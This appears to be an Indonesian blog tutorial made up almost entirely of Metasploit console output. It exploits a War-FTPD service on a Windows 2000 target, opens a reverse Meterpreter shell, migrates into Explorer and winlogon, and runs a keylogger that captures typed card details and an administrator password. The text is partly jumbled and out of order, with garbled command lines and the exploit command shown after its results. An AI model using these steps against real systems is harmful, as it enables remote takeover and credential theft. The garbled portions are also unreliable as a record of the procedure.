[*] Handler binding to LHOST 0.0.0.0
[*] Started reverse handler
[*] Connecting to FTP server 172.16.104.145:21...
...[*] Connected to target FTP server.
[*] Trying target Windows 2000 SP0-SP4 English...
[*] Transmitting intermediate stager for over-sized stage...(191 bytes)
[*] Sending stage (2650 bytes)
[*] Sleeping before handling stage...
[*] Uploading DLL (75787 bytes)...
[*] Upload completed.
[*] Meterpreter session 4 opened (172.16.104.130:4444 -> 172.16.104.145:1246)
meterpreter >
Process list
============
...
PID Name Path
--- ---- ----
140 smss.exe \SystemRoot\System32\smss.
188 winlogon.exe ??\C:\WINNT\system32\winlo
216 services.exe C:\WINNT\system32\services
228 lsass.exe C:\WINNT\system32\lsass.ex
380 svchost.exe C:\WINNT\system32\svchost.
408 spoolsv.exe C:\WINNT\system32\spoolsv.
444 svchost.exe C:\WINNT\System32\svchost.
480 regsvc.exe C:\WINNT\system32\regsvc.e
500 MSTask.exe C:\WINNT\system32\MSTask.e
528 VMwareService.exe C:\Program Files\VMwareVMware Tools\VMwareService.exe
588 WinMgmt.exe C:\WINNT\System32\WBEMWinM
664 notepad.exe C:\WINNT\System32\notepad.
724 cmd.exe C:\WINNT\System32\cmd.exe
768 Explorer.exe C:\WINNT\Explorer.exe
800 war-ftpd.exe C:\Program Files\War-ftpd\war-ftpd.ex
888 VMwareTray.exe C:\Program Files\VMware\VMware Tools\VMwareTray.exe
896 VMwareUser.exe C:\Program Files\VMware\VMware Tools\VMwareUser.exe
940 firefox.exe C:\Program Files\Mozilla Firefox\firefox.exe
972 TPAutoConnSvc.exe C:\Program Files\VMware\VMware Tools\TPAutoConnSvc.exe
1088 TPAutoConnect.exe C:\Program Files\VMware\VMware Tools\TPAutoConnect.exe
meterpreter > migrate 768
[*] Migrating to 768...
[*] Migration completed successfully.
meterpreter > getpid
Current pid: 768
Starting the keystroke sniffer...
meterpreter > keyscan_dump
Dumping captured keystrokes...
tgoogle.cm my credit amex myusernamthi amexpasswordpassword
Process list
=================
...PID Name Path
--- ---- ----
401 winlogon.exe C:\WINNT\system32\winlogon
meterpreter > migrate 401
[*] Migrating to 401...
[*] Migration completed successfully.
meterpreter > keyscan_start
Starting the keystroke sniffer...
**** A few minutes later after an admin logs in ****
meterpreter > keyscan_dump
Dumping captured keystrokes...
Administrator ohnoes1vebeenh4x0red!
bisa mencatat... logon di windows ya...
Saatnya menggunakan Keylogger menggunakan Metasploit !!!
kita dapat mengeti ketikan ketikan keyboard target dengan cara seperti ini ...
msf exploit(warftpd_165_user) > exploit
meterpreter > ps exe gon.exe .exe e exe exe exe xe xe gmt.exe exe e
meterpreter > keyscan_start
Silahkan Tulis Komentar Anda ...